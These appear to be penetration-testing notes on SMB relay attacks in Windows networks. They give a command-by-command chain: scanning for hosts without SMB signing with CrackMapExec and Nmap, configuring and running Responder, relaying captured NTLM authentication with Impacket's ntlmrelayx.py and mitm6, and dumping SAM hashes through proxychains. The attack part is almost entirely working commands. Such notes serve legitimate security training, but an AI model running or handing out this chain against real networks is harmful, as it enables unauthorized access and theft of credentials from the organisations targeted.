SMB relay attack is just relaying those credentials you capture with responder like, in the LLMNR Poisoning but this time you authenticate with those in other machines.
- SMB Signing needs to be disabled on target
- User must have elevated privileges in the machine, like local admin, domain administrator, member of, and the group etc.
- SMB Signing verify the authenticity and origin of the SMB packets. Prevents SMB MiTM attacks effectively.
- You can use Crackmapexec and Nmap to scan the entire network for SMB signing to make much easier the job.
Use this command and see the results.
crackmapexec smb <ip-address>- Nmap haves a script to verify if SMB is signed or not. Use the following command and see the results.
nmap --script=smb2-security-mode.nse -p 445,139 192.168.64.129 -Pn --openFirst, we need to configure the responder, just change SMB and HTTP to Off:
[Responder Core]
; Servers to start
SQL = On
SMB = Off
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = OnWe do not want to respond to these protocols as we will be capturing the hash and relaying it to a different tool called ntlmrelayx.py from Impacket.
sudo python Responder.py -I eth0 -vLater than, call ntlmrelayx.py:
sudo python ntlmrelayx.py -t 192.168.1.11 -smb2support-
mitm6 -d domain-name.local ntlmrelayx.py -6 -wh <target-ip> -t smb://<target-ip> -socks -debug -smb2support # Once you have credentials with a TRUE status use proxychains to relay the credentials. proxychains cme smb <target-ip> -u <User> -p 'whateveryouwant' -d 'domaincorp' --sam 2>/dev/null